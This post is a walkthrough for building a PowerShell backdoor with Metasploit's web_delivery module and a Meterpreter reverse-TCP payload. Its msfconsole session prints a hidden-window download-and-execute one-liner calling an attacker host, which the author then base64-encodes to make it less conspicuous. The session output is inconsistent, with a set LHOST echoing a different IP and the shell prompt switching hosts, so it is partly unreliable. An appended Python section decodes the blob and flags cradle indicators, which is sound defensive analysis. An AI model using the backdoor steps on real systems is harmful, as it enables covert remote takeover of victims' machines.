Generating a PowerShell backdoor with Metasploit

Set up a PowerShell backdoor from a Kali shell, designed for PowerShell on Windows.

Ref: www.arche.name/?p=252

root@kali:~# msfconsole
 
msf  >  use exploit/multi/script/web_delivery
msf exploit(web_delivery) >  set target 2
target => 2
msf exploit(web_delivery) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
 
msf exploit(web_delivery) > set lhost 192.168.4.95
lhost => 192.168.17.131
msf exploit(web_delivery) > set lport 9999
lport => 9999
msf exploit(web_delivery) > set srvport 8888
srvport => 8888
msf exploit(web_delivery) > set uripath /
uripath => /
 
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on 192.168.4.95:9999
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.4.95:8888/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.4.95:8888/');

The PowerShell command that msfconsole prints after "Run the following command on the target machine" (line 26 of the listing) is the generated one-liner that the trojan uses to connect back; running it on the target machine is all that is needed.

However, this one-liner contains the IP address in plain text, which is very conspicuous, so we do a simple encoding job.

root@ROPKA:~# echo "$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.4.95:8888/')" >> ~/shellcode.txt
root@ROPKA:~# cat shellcode.txt | iconv --to-code UTF-16LE |base64
PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcABy
AG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMA
dABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABp
AGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQA
ZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABv
AGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANAAuADkA
NQA6ADgAOAA4ADgALwAnACkACgA=
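The encoding above (UTF-16LE, then base64) is exactly the form powershell.exe accepts through -EncodedCommand, so the same transformation run in reverse is what an analyst does when such a command line shows up in process-creation logs. The following script is an added example, not code from the post: it decodes the post's own blob, and flags the download-cradle indicators (net.webclient, downloadstring, IEX, -nop, -w hidden, an embedded URL) in both the plaintext one-liner printed by msfconsole and a constructed -enc variant. The indicator list and the -e/-ec/-enc option handling are assumptions of this example. Decoding the post's blob also shows what actually got encoded: bash expanded $l to nothing inside the double quotes, so the decoded text starts with "=new-object" and contains no variable at all.

```python
import base64
import binascii
import re

# Base64 blob copied verbatim from the listing above (the post's own data,
# not constructed here): the author's UTF-16LE + base64 encoding of the
# web_delivery one-liner.
PAGE_BLOB = """
PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcABy
AG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMA
dABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABp
AGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQA
ZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABv
AGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANAAuADkA
NQA6ADgAOAA4ADgALwAnACkACgA=
"""

# The plaintext one-liner exactly as msfconsole printed it in the listing above.
PAGE_PLAINTEXT = (
    "powershell.exe -nop -w hidden -c $l=new-object net.webclient;"
    "$l.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $l.downloadstring('http://192.168.4.95:8888/');"
)

# Constructed sample (not from the post): the blob passed via -enc, which is
# how a UTF-16LE/base64 script normally reaches powershell.exe.
ENCODED_SAMPLE = "powershell.exe -nop -w hidden -enc " + "".join(PAGE_BLOB.split())

# Indicator patterns for PowerShell download cradles. This list is an
# assumption of this example; the post defines no such rules.
INDICATORS = {
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile", re.I),
    "url": re.compile(r"https?://[\w.\-]+(?::\d+)?/?", re.I),
}

# -EncodedCommand and the abbreviations powershell.exe accepts for it,
# followed by the base64 argument.
ENC_OPTION = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(blob: str) -> str:
    """Reverse the post's encoding: base64 -> UTF-16LE bytes -> text."""
    raw = base64.b64decode("".join(blob.split()))
    return raw.decode("utf-16-le")


def extract_encoded_script(cmdline: str):
    """Return the decoded script if the command line carries an encoded
    command, otherwise None (also None when the argument is not valid base64)."""
    m = ENC_OPTION.search(cmdline)
    if not m:
        return None
    try:
        return decode_encoded_command(m.group(1))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyse(cmdline: str) -> dict:
    """Decode any embedded script, then collect indicator hits over both the
    outer command line (flags such as -nop / -w hidden live there) and the
    decoded script (the cradle itself lives there)."""
    decoded = extract_encoded_script(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {}
    for name, pattern in INDICATORS.items():
        m = pattern.search(text)
        if m:
            hits[name] = m.group(0)
    return {"decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    for label, sample in (("plaintext", PAGE_PLAINTEXT), ("encoded", ENCODED_SAMPLE)):
        result = analyse(sample)
        print(f"[{label}] indicators: {sorted(result['indicators'])}")
        if result["decoded"] is not None:
            print(f"[{label}] decoded script: {result['decoded'].strip()}")
```

Both samples trip the same six indicators; the encoded one does so only because the script is decoded before matching, which is the step that base64 alone is meant to defeat. The decoded output for the post's blob begins with "=new-object net.webclient;.proxy=" because the shell stripped the $l references before the text was ever encoded.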
